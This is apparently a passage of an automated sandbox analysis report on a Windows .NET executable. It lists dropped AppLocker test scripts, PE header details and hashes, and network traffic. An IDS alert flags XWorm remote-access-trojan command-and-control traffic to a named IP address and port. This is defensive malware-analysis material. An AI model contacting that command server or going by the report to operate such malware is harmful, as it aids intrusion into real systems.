                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t2vubvs.2sz.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cu4dy5fs.0e4.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg3filhp.d5i.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fu2hfgnm.zhj.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gc4pkhha.yi1.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzoh4bn1.xat.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2g1okj0.bbp.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4w41piu.qmq.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kctmzf4k.ohf.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ks5yiyoj.lfe.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4mj1vwm.2dj.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgr4hkf5.qv1.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uckrjrpv.dal.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufb5cdbo.2kn.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xllmabma.d0s.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5clvhfr.lvo.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):6.045708896884392
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:file.exe
                                                              File size:46'592 bytes
                                                              MD5:2982d11d3b0789476831097f0e213007
                                                              SHA1:b2b7d5f73b65c3df4d3da8a5a266f47d3685a044
                                                              SHA256:bdff38ae5b6ac3ab4135894064d15e3ab14efe28b9463c98b185fb0cdfd3ad1f
                                                              SHA512:b496db043ee6758e63c3f2aa2e2b03775eaaf657638daa0b989ed85221a4c98fb7fbd53f836ca4d12dcf1c536222d65d398d543f39ad0447666e4842a39f8cde
                                                              SSDEEP:768:JXDCY0GcQ5pcP7tbaRcqKlnFPc9Goxq6sOuhe/gDu/cjGBd00:JOLeKkRMFk9Gv6sOuOUzGBdl
                                                              TLSH:84235B4877924215EABD1FF06AB3A24246B9F9137913EB5F0CD486CA2F637814A407F7
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Hg................................. ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:0f2165e46465038f

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40b3fe
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x67489EE5 [Thu Nov 28 16:48:37 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb3a80x53.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1a04.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x94040x9600a377ca66202582e93ab2cd2b78c8d770False0.48104166666666665data5.712354340415364IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xc0000x1a040x1c0078155b599470f796dd7e544eded26f97False0.8058035714285714data7.44234779107812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xe0000xc0x200251cf3061796844a58b298fe856f5db3False0.041015625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xc1300x1498PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.963391502276176
                                                              RT_GROUP_ICON0xd5c80x14data0.95
                                                              RT_VERSION0xd5dc0x23cdata0.4772727272727273
                                                              RT_MANIFEST0xd8180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-10T19:46:25.070884+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549818147.185.221.243804TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 10, 2024 19:46:02.468574047 CET497973804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.589154005 CET380449797147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:02.589219093 CET497973804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.716171980 CET380449797147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:02.716223001 CET497973804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.717710018 CET497973804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.832828045 CET497973804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.836234093 CET498033804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:02.991723061 CET380449797147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:03.037508965 CET380449797147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:03.037735939 CET380449803147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:03.037842035 CET498033804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:03.056596994 CET498033804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:03.172219038 CET380449803147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:03.172270060 CET498033804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:03.181243896 CET380449803147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:03.304172993 CET380449803147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:13.442696095 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:13.562853098 CET380449818147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:13.562969923 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:13.590426922 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:13.733665943 CET380449818147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:25.070883989 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:25.191143990 CET380449818147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:35.474371910 CET380449818147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:35.474472046 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:37.348269939 CET498183804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:37.484278917 CET380449818147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.411588907 CET498203804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.549408913 CET380449820147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.549504042 CET498203804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.577826023 CET498203804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.679594994 CET380449820147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.679671049 CET498203804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.724816084 CET380449820147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.754462004 CET498203804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.755486965 CET498213804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.802064896 CET380449820147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.878009081 CET380449820147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.878025055 CET380449821147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:43.878130913 CET498213804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:43.894227028 CET498213804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:44.137996912 CET380449821147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:44.139215946 CET380449821147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:48.632339001 CET498233804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:48.764195919 CET380449823147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:48.764427900 CET498233804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:48.793987036 CET498233804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:48.898384094 CET380449823147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:48.898443937 CET498233804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:48.913619995 CET380449823147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:48.957536936 CET498233804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:48.958328009 CET498243804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:49.021800995 CET380449823147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:49.077152967 CET380449823147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:49.077660084 CET380449824147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:49.077796936 CET498243804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:49.093622923 CET498243804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:49.197624922 CET380449824147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:49.197706938 CET498243804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:49.214948893 CET380449824147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:49.318296909 CET380449824147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.552344084 CET498253804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.690241098 CET380449825147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.690392971 CET498253804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.708767891 CET498253804192.168.2.5147.185.221.24
